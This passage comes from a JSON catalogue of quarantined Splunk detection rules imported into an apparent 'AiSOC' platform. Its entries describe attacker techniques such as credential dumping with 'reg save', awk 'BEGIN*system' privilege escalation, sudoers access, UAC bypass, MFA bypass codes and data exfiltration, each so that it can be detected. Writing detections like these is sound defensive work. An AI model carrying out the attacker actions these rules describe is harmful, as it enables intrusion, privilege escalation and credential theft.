If confirmed malicious, this could enable unauthorized code execution, privilege escalation, or persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-compatibility-telemetry-tampering-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "43834687-cc48-4878-a2fa-f76e4271791f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_compatibility_telemetry_tampering_through_registry.yml" } }, { "id": "splunk-security-content-43bc9281-753b-4743-b4b7-60af84f085f3", "type": "detection", "name": "Linux Auditd Stop Services", "description": "The following analytic detects attempts to stop a service on Linux systems. It leverages data from Linux Auditd. This activity is significant as adversaries often stop or terminate security or critical services to disable defenses or disrupt operations, as seen in malware like Industroyer2. 
If confirmed malicious, this could lead to the disabling of security mechanisms, allowing attackers to persist, escalate privileges, or deploy destructive payloads, severely impacting system integrity and availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-stop-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "43bc9281-753b-4743-b4b7-60af84f085f3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_stop_services.yml" } }, { "id": "splunk-security-content-446e81ff-ce06-4925-9c7d-4073f9b5abf5", "type": "detection", "name": "Cisco Duo Bypass Code Generation", "description": "The following analytic detects when a Duo user generates a bypass code, which allows them to circumvent multi-factor authentication (2FA) protections.\nIt works by monitoring Duo activity logs for the 'bypass_create' action, renaming the affected object as the user, and aggregating events to identify\ninstances where a bypass code is issued. This behavior is significant for a Security Operations Center (SOC) because generating a bypass code can enable\nattackers, malicious insiders, or unauthorized administrators to gain access to sensitive systems without the required second authentication factor.\nSuch activity may indicate account compromise, privilege abuse, or attempts to weaken security controls. 
Early detection of bypass code generation is\ncritical, as it allows the SOC to investigate and respond before an attacker can exploit the reduced authentication requirements, helping to prevent\nunauthorized access, data breaches, or further lateral movement within the environment. Monitoring for this action helps maintain strong authentication\nstandards and reduces the risk of credential-based attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-bypass-code-generation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "446e81ff-ce06-4925-9c7d-4073f9b5abf5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_bypass_code_generation.yml" } }, { "id": "splunk-security-content-4477f3ea-a28f-11eb-b762-acde48001122", "type": "detection", "name": "Multiple Archive Files Http Post Traffic", "description": "The following analytic detects the high-frequency exfiltration of archive files via HTTP POST requests. It leverages HTTP stream logs to identify specific archive file headers within the request body. This activity is significant as it often indicates data exfiltration by APTs or trojan spyware after data collection. 
If confirmed malicious, this behavior could lead to the unauthorized transfer of sensitive data to an attacker\u2019s command and control server, potentially resulting in severe data breaches and loss of confidential information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/multiple-archive-files-http-post-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4477f3ea-a28f-11eb-b762-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/multiple_archive_files_http_post_traffic.yml" } }, { "id": "splunk-security-content-4479539c-71fc-11ec-b2e2-acde48001122", "type": "detection", "name": "Linux Possible Access To Sudoers File", "description": "The following analytic detects potential access or modification of the /etc/sudoers file on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"cat,\" \"nano,\" \"vim,\" and \"vi\" accessing the /etc/sudoers file. This activity is significant because the sudoers file controls user permissions for executing commands with elevated privileges. 
If confirmed malicious, an attacker could gain persistence or escalate privileges, compromising the security of the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-access-to-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4479539c-71fc-11ec-b2e2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_access_to_sudoers_file.yml" } }, { "id": "splunk-security-content-449f525a-7b42-47be-96a7-d9724e336c19", "type": "detection", "name": "O365 Email New Inbox Rule Created", "description": "The following analytic identifies the creation of new email inbox rules in an Office 365 environment. It detects events logged under New-InboxRule and Set-InboxRule operations within the o365_management_activity data source, focusing on parameters that may indicate mail forwarding, removal, or obfuscation. 
Inbox rule creation is a typical end-user activity; however, attackers also leverage this technique for multiple reasons.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003", "T1564.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-new-inbox-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "449f525a-7b42-47be-96a7-d9724e336c19", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_new_inbox_rule_created.yml" } }, { "id": "splunk-security-content-44badcb1-2e8c-4628-9537-021bbae571ad", "type": "detection", "name": "Windows Cisco Secure Endpoint Stop Immunet Service Via Sfc", "description": "The following analytic detects the use of the `sfc.exe` utility in order to stop the Immunet Protect service. The Sfc.exe utility is part of the Cisco Secure Endpoint installation. This detection leverages telemetry from the endpoint, focusing on command-line executions involving the `-k` parameter. This activity is significant as it indicates potential tampering with defensive mechanisms. 
If confirmed malicious, attackers could partially blind the EDR, enabling further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cisco-secure-endpoint-stop-immunet-service-via-sfc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "44badcb1-2e8c-4628-9537-021bbae571ad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cisco_secure_endpoint_stop_immunet_service_via_sfc.yml" } }, { "id": "splunk-security-content-44fddcb2-8d3b-454c-874e-7c6de5a4f7ac", "type": "detection", "name": "Detect Rare Executables", "description": "The following analytic detects the execution of rare processes that appear only once across the network within a specified timeframe.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs.\nThis activity is significant for a SOC as it helps identify potentially malicious activities or unauthorized software, which could indicate a security breach or ongoing attack.\nIf confirmed malicious, such rare processes could lead to data theft, privilege escalation, or complete system compromise, making early detection crucial for minimizing impact.\nThe search currently identifies processes executed on fewer than 10 hosts, but this threshold can be adjusted based on the organization's environment and risk tolerance.\nThe search groups results by process name which can lead 
to blind spots if a malicious process uses a common name. To mitigate this, consider enhancing the detection logic to group by additional attributes such as process hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rare-executables.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "44fddcb2-8d3b-454c-874e-7c6de5a4f7ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rare_executables.yml" } }, { "id": "splunk-security-content-4510cae0-96a2-4840-9919-91d262db210a", "type": "detection", "name": "Linux AWK Privilege Escalation", "description": "The following analytic detects the use of the AWK command with elevated privileges to execute system commands. It leverages Endpoint Detection and Response (EDR) telemetry, specifically monitoring processes that include \"sudo,\" \"awk,\" and \"BEGIN*system\" in their command lines. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain root access by executing commands as the root user. 
If confirmed malicious, this could allow an attacker to fully compromise the system, execute arbitrary commands, and maintain persistent control over the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-awk-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4510cae0-96a2-4840-9919-91d262db210a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_awk_privilege_escalation.yml" } }, { "id": "splunk-security-content-453a6b0f-b0ea-48fa-9cf4-20537ffdd22c", "type": "detection", "name": "Windows UAC Bypass Suspicious Child Process", "description": "The following analytic detects when an executable known for User Account Control (UAC) bypass exploitation spawns a child process in a user-controlled location or a command shell executable (e.g., cmd.exe, powershell.exe). This detection leverages Sysmon EventID 1 data, focusing on high or system integrity level processes with specific parent-child process relationships. This activity is significant as it may indicate an attacker has successfully used a UAC bypass exploit to escalate privileges. 
If confirmed malicious, this could allow the attacker to execute arbitrary commands with elevated privileges, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-uac-bypass-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "453a6b0f-b0ea-48fa-9cf4-20537ffdd22c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_uac_bypass_suspicious_child_process.yml" } }, { "id": "splunk-security-content-454076fb-0e9e-4adf-b93a-da132621c5e6", "type": "detection", "name": "Kubernetes Process Running From New Path", "description": "The following analytic identifies processes running from newly seen paths within a Kubernetes environment. It leverages process metrics collected via an OTEL collector and hostmetrics receiver, and data is pulled from Splunk Observability Cloud using the Splunk Infrastructure Monitoring Add-on. This detection compares processes observed in the last hour with those seen over the previous 30 days. This activity is significant as it may indicate unauthorized changes, compromised nodes, or the introduction of malicious software. 
If confirmed malicious, it could lead to unauthorized process execution, control over critical resources, data exfiltration, privilege escalation, or malware introduction within the Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-process-running-from-new-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "454076fb-0e9e-4adf-b93a-da132621c5e6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_process_running_from_new_path.yml" } }, { "id": "splunk-security-content-455da527-0047-4610-a3ca-b4a005c2d346", "type": "detection", "name": "Windows Remote Host Computer Management Access", "description": "The following analytic detects the use of mmc.exe to launch Computer Management (compmgmt.msc) and connect to a remote machine. This technique allows administrators to access system management tools, including Event Viewer, Services, Shared Folders, and Local Users & Groups, without initiating a full remote desktop session. While commonly used for legitimate administrative purposes, adversaries may leverage this method for remote reconnaissance, privilege escalation, or persistence. 
Monitoring the execution of mmc.exe with the /computer:{hostname/ip} argument can help detect unauthorized system administration attempts or lateral movement within a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-host-computer-management-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "455da527-0047-4610-a3ca-b4a005c2d346", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_host_computer_management_access.yml" } }, { "id": "splunk-security-content-459628e3-1b00-4e9b-9e5b-7da8961aea35", "type": "detection", "name": "Windows Shell Process from CrushFTP", "description": "The following analytic identifies instances where CrushFTP's service process (crushftpservice.exe) spawns shell processes like cmd.exe or powershell.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events. This activity is significant because CrushFTP should not normally spawn interactive shell processes during regular operations. 
If confirmed malicious, this behavior could indicate successful exploitation of vulnerabilities like CVE-2025-31161, potentially allowing attackers to execute arbitrary commands with the privileges of the CrushFTP service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003", "T1190", "T1505" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-shell-process-from-crushftp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "459628e3-1b00-4e9b-9e5b-7da8961aea35", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_shell_process_from_crushftp.yml" } }, { "id": "splunk-security-content-45b125c4-866f-11eb-a95a-acde48001122", "type": "detection", "name": "Windows High File Deletion Frequency", "description": "The following analytic identifies a high frequency of file deletions by monitoring Sysmon EventCodes 23 and 26 for specific file extensions. This detection leverages Sysmon logs to track deleted target filenames, process names, and process IDs. Such activity is significant as it often indicates ransomware behavior, where files are encrypted and the originals are deleted. 
If confirmed malicious, this activity could lead to extensive data loss and operational disruption, as ransomware can render critical files inaccessible, demanding a ransom for their recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-high-file-deletion-frequency.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "45b125c4-866f-11eb-a95a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_high_file_deletion_frequency.yml" } }, { "id": "splunk-security-content-45cd08f8-a2c9-4f4e-baab-e1a0c624b0ab", "type": "detection", "name": "Disabling Windows Local Security Authority Defences via Registry", "description": "The following analytic identifies the deletion of registry keys that disable Local Security Authority (LSA) protection and Microsoft Defender Device Guard. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry actions and paths associated with LSA and Device Guard settings. This activity is significant because disabling these defenses can leave a system vulnerable to various attacks, including credential theft and unauthorized code execution. 
If confirmed malicious, this action could allow attackers to bypass critical security mechanisms, leading to potential system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-windows-local-security-authority-defences-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "45cd08f8-a2c9-4f4e-baab-e1a0c624b0ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml" } }, { "id": "splunk-security-content-45ebd21c-f4bf-4ced-bd49-d25b6526cebb", "type": "detection", "name": "Windows Query Registry Browser List Application", "description": "The following analytic detects a suspicious process accessing the registry entries for default internet browsers. It leverages Windows Security Event logs, specifically event code 4663, to identify access attempts to these registry paths. This activity is significant because adversaries can exploit this registry key to gather information about installed browsers and their settings, potentially leading to the theft of sensitive data such as login credentials and browsing history. 
If confirmed malicious, this behavior could enable attackers to exfiltrate sensitive information and compromise user accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-query-registry-browser-list-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "45ebd21c-f4bf-4ced-bd49-d25b6526cebb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_query_registry_browser_list_application.yml" } }, { "id": "splunk-security-content-4662c6b1-0754-455e-b9ff-3ee730af3ba8", "type": "detection", "name": "Windows Modify Registry With MD5 Reg Key Name", "description": "The following analytic detects potentially malicious registry modifications characterized by MD5-like registry key names. It leverages the Endpoint data model to identify registry entries under the SOFTWARE path with 32-character hexadecimal names, a technique often used by NjRAT malware for fileless storage of keylogs and .DLL plugins. This activity is significant as it can indicate the presence of NjRAT or similar malware, which can lead to unauthorized data access and persistent threats within the environment. 
If confirmed malicious, attackers could maintain persistence and exfiltrate sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-with-md5-reg-key-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4662c6b1-0754-455e-b9ff-3ee730af3ba8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml" } }, { "id": "splunk-security-content-466379bc-0f47-476c-8202-16ef38112e0d", "type": "detection", "name": "Windows Registry Entries Exported Via Reg", "description": "The following analytic detects the execution of the reg.exe process with either the \"save\" or \"export\" parameters. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because threat actors often use the \"reg save\" or \"reg export\" command to dump credentials or test registry modification capabilities on compromised hosts. 
If confirmed malicious, this behavior could allow attackers to escalate privileges, persist in the environment, or access sensitive information stored in the registry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-entries-exported-via-reg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "466379bc-0f47-476c-8202-16ef38112e0d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_entries_exported_via_reg.yml" } }, { "id": "splunk-security-content-4669561d-3bbd-44e3-857c-0e3c6ef2120c", "type": "detection", "name": "Linux Auditd Data Transfer Size Limits Via Split", "description": "The following analytic detects suspicious data transfer activities that involve the use of the `split` syscall, potentially indicating an attempt to evade detection by breaking large files into smaller parts. Attackers may use this technique to bypass size-based security controls, facilitating the covert exfiltration of sensitive data. 
By monitoring for unusual or unauthorized use of the `split` syscall, this analytic helps identify potential data exfiltration attempts, allowing security teams to intervene and prevent the unauthorized transfer of critical information from the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-data-transfer-size-limits-via-split.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4669561d-3bbd-44e3-857c-0e3c6ef2120c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_data_transfer_size_limits_via_split.yml" } }, { "id": "splunk-security-content-467ed9d9-8035-470e-ad5e-ae5189283033", "type": "detection", "name": "Windows Impair Defense Add Xml Applocker Rules", "description": "The following analytic detects the use of a PowerShell commandlet to import an AppLocker XML policy. This behavior is identified by monitoring processes that execute the \"Import-Module Applocker\" and \"Set-AppLockerPolicy\" commands with the \"-XMLPolicy\" parameter. This activity is significant because it can indicate an attempt to disable or bypass security controls, as seen in the Azorult malware. 
If confirmed malicious, this could allow an attacker to disable antivirus products, leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-add-xml-applocker-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "467ed9d9-8035-470e-ad5e-ae5189283033", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_add_xml_applocker_rules.yml" } }, { "id": "splunk-security-content-468b7e11-d362-43b8-b6ec-7a2d3b246678", "type": "detection", "name": "Detect RTLO In File Name", "description": "The following analytic identifies the use of the right-to-left override\n(RTLO) character in file names. It leverages data from the Endpoint.Filesystem datamodel,\nspecifically focusing on file creation events and file names containing the RTLO\ncharacter (U+202E). 
This activity is significant because adversaries use RTLO to\ndisguise malicious files as benign by reversing the text that follows the character.\nIf confirmed malicious, this technique can deceive users and security tools, leading\nto the execution of harmful files and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rtlo-in-file-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "468b7e11-d362-43b8-b6ec-7a2d3b246678", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rtlo_in_file_name.yml" } }, { "id": "splunk-security-content-46ba0082-61af-11ec-9826-acde48001122", "type": "detection", "name": "Linux File Creation In Profile Directory", "description": "The following analytic detects the creation of files in the /etc/profile.d directory on Linux systems. It leverages filesystem data to identify new files in this directory, which is often used by adversaries for persistence by executing scripts upon system boot. This activity is significant as it may indicate an attempt to maintain long-term access to the compromised host. 
If confirmed malicious, this could allow attackers to execute arbitrary code with elevated privileges each time the system boots, potentially leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-file-creation-in-profile-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "46ba0082-61af-11ec-9826-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_file_creation_in_profile_directory.yml" } }, { "id": "splunk-security-content-46d676aa-40c6-4fe6-b917-d23b621f0f89", "type": "detection", "name": "Windows Credentials from Password Stores Deletion", "description": "The following analytic detects the execution of the Windows OS tool cmdkey.exe with the /delete parameter. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. The activity is significant because cmdkey.exe can be used by attackers to delete stored credentials, potentially leading to privilege escalation and persistence. 
If confirmed malicious, this behavior could allow attackers to remove stored user credentials, hindering incident response efforts and enabling further unauthorized access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "46d676aa-40c6-4fe6-b917-d23b621f0f89", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_deletion.yml" } }, { "id": "splunk-security-content-46f946ed-1c78-4e96-9906-c7a4be15e39b", "type": "detection", "name": "Internal Vulnerability Scan", "description": "This analytic detects internal hosts triggering multiple IDS signatures, which may include either more than 25 signatures against a single host or a single signature across over 25 destination IP addresses. Such patterns can indicate active vulnerability scanning activities within the network. 
By monitoring IDS logs, this detection helps identify and respond to potential vulnerability scanning attempts, enhancing the network's security posture and preventing potential exploits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595.002", "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-vulnerability-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "46f946ed-1c78-4e96-9906-c7a4be15e39b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_vulnerability_scan.yml" } }, { "id": "splunk-security-content-473bd65f-06ca-4dfe-a2b8-ba04ab4a0084", "type": "detection", "name": "Suspicious Email Attachment Extensions", "description": "The following analytic detects emails containing attachments with suspicious file extensions. It leverages the Email data model in Splunk, using the tstats command to identify emails where the attachment filename is not empty. This detection is significant for SOC analysts as it highlights potential phishing or malware delivery attempts, which are common vectors for data breaches and malware infections. If 